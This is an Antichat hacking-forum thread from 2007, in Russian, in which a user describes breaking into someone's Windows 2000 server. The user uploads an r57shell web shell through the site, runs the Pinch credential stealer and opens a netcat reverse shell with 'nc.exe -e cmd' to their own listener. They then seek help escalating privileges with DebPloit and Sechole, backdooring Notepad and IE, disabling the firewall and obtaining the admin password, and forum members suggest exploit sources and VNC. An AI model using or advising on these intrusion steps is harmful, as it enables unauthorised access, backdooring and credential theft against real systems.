Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Windows (https://forum.antichat.xyz/forumdisplay.php?f=42)
-   -   Windows server 2000 (https://forum.antichat.xyz/showthread.php?t=33511)

host123 16.02.2007 16:53

Windows server 2000
 
Здраствуйте,
Закачал шел на виндовый сервак (Microsoft Windows 2000 [Version 5.00.2195]),
в шеле моно выполнять команды,
ipconfig показал:
Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.1.104
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1

я так понял сервак локальный.?

закачал netcat
у себя открыл консоль:
c:\put_k_nc\nc.exe -l -p 4000
и там
запустил nc.exe (мой IP) 4000 -e cmd
покавырявшись оказалось что у меня мало прав.
попробывал запустить DebPloit
и нех.. недало, подскажите пожалуйста как поднять прова и че вообще моно сделать.

hsi 16.02.2007 19:19

Цитата:

я так понял сервак локальный.?
Если ты на него залез, то нет. ipconfig показывает настройки сетевых интерфейсов.

Ищи уязвимые дем... эээ, сервисы. Возможно винда не патченная. elsenot.com - все публичные эксплойты/уязвимости и их описания.
И с командной строкой в win работать неудобно, поставь GUI вроде VNC.

host123 16.02.2007 19:46

Цитата:

Если ты на него залез, то нет
Почему нет??? я ж через php шел залез

И вообще мне кажиется что это виртуалка, памяти на всем серваке 3 гега.
Вот хочю попробывать BackDoor Injector v2.0 заразить блакнот, IE, и еще ченибуть.
Ктонить работал с такой прогой???
Если да то ей моно через консль управлять???
И как удаленно Броузер и фаер. вырубить чтоб неругался на ее???

andy13 16.02.2007 20:14

как можно было зайти на этот сервер,
если ip у него 192.168.1.104?
на чем-то другом порт на него прокинут?

host123 16.02.2007 20:42

я через сайт залил шел r57shell и зашел.
а там дальше сначала пинча запустил, получил отчет пустой.
Дальше nc запустил чтобы он ко мне приконектился.

host123 25.02.2007 13:41

Подскажите команду для Вин 2000 чтобы увидет список процессов.
tasklist некатит для 2000
И команду чтобы убить процесс.

limpompo 25.02.2007 15:23

Цитата:

как можно было зайти на этот сервер,
если ip у него 192.168.1.104?
Походу это локальный Сервак.....

Ch3ck 25.02.2007 17:01

Цитата:

tasklist некатит для 2000
Тасклист есть только в WinXp Proff.
На сколько я помню, в Win2000 процесс убивается командой kill(-f), а список процессов можно посмотреть командой
TLIST(-t) По-моему. Вообщем не забудь про /?

host123 27.02.2007 00:35

А как моно добыть пароль админа ????
На серваке включено удаленое управление рабочим сталом и VNC .
Продовал спомощю (- Sechole ) добавить нового пользователя и непрокатило, вылезла такая бодяга: ERROR: could not get the task list
.
для справки:

- Sechole Эта программка как и описанная выше добавляет юзеров в локальную группу админов. Утилита модифицирует в оперативной памяти код вызова процедуры OpenProcess и это позволяет ей подключится к привилегирированному процессу, независимо от того, имеет ли она для этого соответствующие разрешения. После успешного подключения она работает так же как и описанная выше утилита, добавляя юзера в секту Админов.


Время: 14:30